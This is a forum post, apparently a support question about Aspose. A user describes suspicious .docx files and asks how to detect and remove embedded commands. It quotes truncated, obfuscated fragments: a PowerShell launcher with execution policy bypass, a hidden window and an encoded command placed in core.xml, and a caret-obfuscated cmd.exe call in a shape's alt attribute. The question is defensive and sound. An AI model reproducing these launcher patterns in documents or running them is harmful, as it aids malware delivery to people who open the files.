I have some docx documents but the documents might be malicious so I not going to attach it here. When I unzip the docx and I open up the core.xml, it contain powershell command like so:
<dc:title > poWErsHell.eXe -EXEcUtIONpOLiCY bYpAsS -nOprOFiLe -windoWsTYle hiddEn -encODeDcOMmAnD`
In another document, document.xml there’s a shape tag and the attribute of this tag is trying to run a cmd.
<v:shape id="_x0000_i1032" type="#_x0000_t75" alt="cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy`
while in some other documents, it contain links to external website which I think it might be malicious link like so:
How can I check whether such a thing exists in my document, Does Aspose have any function call to access to it ? If there’s a function call to it, how can I use it to remove it?